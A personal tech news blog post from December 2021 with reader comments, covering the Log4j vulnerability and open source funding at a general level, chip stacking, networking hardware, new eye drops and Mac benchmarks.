Sunday, December 12


Daily News Stuff 12 December 2021

RCE On Mars Edition

Top Story

  • A massive vulnerability in a Java logging library widely used in enterprise software caused utter panic at pretty much every major company in the world.  One commenter mentioned being in a Slack channel with three thousand other engineers all working frantically to patch systems.

    How much was the team of developers working to maintain this library being paid?

    If you guessed absolutely nothing you'd be very close.  (

    This is obviously unsustainable.  Trillion-dollar companies depend on this software and don't even think about contributing towards its upkeep.

    Open source software is supposed to be open.  It's not supposed to be free, because nothing is free.  If you're not paying for it up front, you'll be paying for it later on by diverting every engineer in your entire organisation two days while other critical issues go ignored.

  • We're from the government.  We're here to help.  (CISA)

    The statement from CISA Director Jen Easterly on the Log4j vulnerability reads
    blah blah blah blah blah you should probably patch that blah blah blah.
    Thanks Jen. 

    The director of the US Cybersecurity and Infrastructure Security Agency has an MA in politics, philosophy, and economics from Oxford, which qualifies her for the job almost as much as you might think.

Tech News

  • What went wrong?

    Some idiots demanded that a logging library perform magic for them.  (Crawshaw)

    And once the magic was put in place, it couldn't be removed because that would break critical software.

    And there wasn't anyone to take the necessary time to push back, deprecate the feature, and eventually remove it, because they weren't getting paid.

  • Cloudflare reports on the vulnerability and their response.  (Cloudflare)

    One important point is that they firewall all their servers for both inbound and outbound access.  If a server gets compromised but is blocked by default from accessing anything else, the damage is contained.

    With this particular exploit the payload was installed by dialling out to a malicious server, and if that connection was blocked, nothing happened.  The server got handed a bottle of poison pills but couldn't get the damn child-proof cap off.

  • Future AMD GPUs could use stacked dies for cache memory and AI accelerators.  (WCCFTech)

    Maybe not the 2022 lineup, but this is likely to happen soon, for reasons.

  • The reasons being that Moore's Law is ending - again - in 2028.  (LessWrong)

    At the 1.5nm node (which doesn't measure 1.5nm in any dimension but never mind that) planar scaling will likely stop.

    What will happen instead - and the linked article goes into all the details you could possibly want - is that chips will go 3D.  Flash storage already has, and it was a revolution.  Cell phone chips stack storage and memory on top of the CPU.  AMD is stacking cache on top of server CPUs, and Intel is wedging stacks of RAM into their supercomputer CPUs.

    One of the side effects of this is that chips will get cheaper.  Fabs - chip factories - are massively expensive, and only remain at the leading edge of technology for a couple of years.  If they lasted for twenty years instead of two - and the machines to make the machines for the fabs also lasted twenty years instead of two - prices would come down drastically.

  • I want to see default RED.  (Reddit)

    While Amazon's systems were down all over the place - not just at US-East-1 but where the one critical Amazon-based service I look after runs in US-West-2 - their public monitoring systems were reporting everything was fine because the outage prevented the monitoring page from updating.

    Monitoring systems should autonomously go red if they can't update.

  • Intel's new X710-T4L is a massive upgrade.  (Serve the Home)

    It's a quad 10Gbase-T card that uses a maximum of 14.2W with all ports running at full speed.  The previous model peaked at 28.9W.

    In fact, this model running at 10Gb uses less power than the previous model running at 1Gb.  That's a huge improvement because a core delaying factor in the rollout of 10Gb Ethernet has been the power requirements for running it over cheap twisted-pair cable.  (It uses less power over specialised cables or fiber, but the pricing is absurd.)

    The new version of the card is also $100 cheaper than the old one at $500.

    It's also out of stock everywhere because everything is.

  • Except the QSW-M2108-2C which does seem to be available albeit in short supply.  (QNAP)

    I wanted a 2.5Gb / 10Gb managed switch for my lab buildout, but had planned to settle for an unmanaged model because I could find one that wasn't insanely expensive.  This is just what I wanted - 8 x 2.5Gb ports, 2 x 10Gb ports with both RJ45 and SFP+ connectors, and fairly solid management features including link aggregation and VLANs.

    Part of the function of the software lab I'm building is to simulate real-world faults, and being able to mess with the network under software control is a key part of that.

    They also have a 16-port model, but that's more than I need, twice as expensive, and out of stock.

  • Managed 1Gb switches are a dime a dozen.  Well, not quite, but you can get them starting at around $35, a tenth the price of the cheapest managed 2.5Gb switches.

  • A new FDA-approved eye drop causes red eyes and headaches.  (CBS News)

    Well, what the hell does it treat then?

    It treats reading glasses.

    If you're between 40 and 65 years old and need reading glasses (but not specifically prescription glasses) these eye drops can alleviate that need for six to ten hours.

    Since I do need prescription glasses (I have three pairs for distance, computers, and reading, plus a couple of spares) these won't do anything for me, but if you just need plain cheap reading glasses they could do the trick.

  • Apple found a benchmark where the 2021 M1 Max MacBook Pro is faster than the 2019 Intel Mac.  (WCCFTech)

    Linus Tech Tips tested the M1 Max and found that while it did excel on one test, most of the time it was slower than an Intel-based notebook with an RTX 3050 - at about one third the price.

    That might change as they improve the drivers and software optimisation but right now it's a very expensive toy.

    I'll likely be getting a MacBook Air or an iMac to do Mac and iOS software testing for work, but I'll be getting the cheapest model I can get away with.

Party Like It's 1979 Video of the Day

Disclaimer: Lights in the mirror may be bluer than they appear.

Posted by: Pixy Misa at 05:27 PM | Comments (6) | Add Comment | Trackbacks (Suck)
Post contains 1109 words, total size 9 kb.

1 Mu/MeeNu Overlord, It appears barbarians of the spamming variety have begun a small skirmish in The Pond. Probably need to put that down quick.

Posted by: Will at Monday, December 13 2021 12:30 AM (8548M)

2 Have you looked at Progressive lenses for your glasses ?  They replace the need for three pairs of glasses by splitting the lens into Near-Close-Far zones and you quickly learn to look at things but tilting your head.  Good for the convenience of replacing three pairs of glasses with one pair  but bad for price as Progressive lenses are quite expensive.

Posted by: David at Monday, December 13 2021 02:19 AM (kOkn4)

3 Is that new eye drug called Retinax?

Posted by: Rick C at Monday, December 13 2021 02:42 AM (Z0GF0)

4 I picked up an i5-12600K yesterday, and a new motherboard to go with it (ASUS ROG STRIX Z690-I SUPER DUPER ULTRA DDR4, I think the name was).  Got one of the few DDR4 mobos because I already had 32GB of that lying around.  Mini ITX board with 4 SATA and 2 M.2.  The latter are on a daughterboard, and that was a minor problem because the heat sink impinged on the heat pipes for the cooler I got.  Fortunately, the way the board works is the M.2 on the underside connects to the CPU and the one on top connects via the SB, so I obviously only used the bottom one, and left the top heatsink off.  It also came with a 2.5GB NIC and wifi 6.  Pretty nice board.
Then I held my nose and upgraded to Windows 11.  Overall the difference is meh but there are a few annoyances, including "why the hell is 'right-click on taskbar to get Task Manager' missing?!"

Posted by: Rick C at Monday, December 13 2021 02:48 AM (Z0GF0)

5 Outlandoes D'Amor is 1978, silly.  Must give us stuff from Reggatta de Blanc, c'mon!
"Bring On The Night"

Posted by: normal at Monday, December 13 2021 11:05 AM (obo9H)

6 Going by date charted rather than date recorded for this list.

Posted by: Pixy Misa at Monday, December 13 2021 03:31 PM (PiXy!)

Hide Comments | Add Comment

Apple pies are delicious. But never mind apple pies. What colour is a green orange?

59kb generated in CPU 0.0146, elapsed 0.1085 seconds.
58 queries taking 0.0994 seconds, 348 records returned.
Powered by Minx 1.1.6c-pink.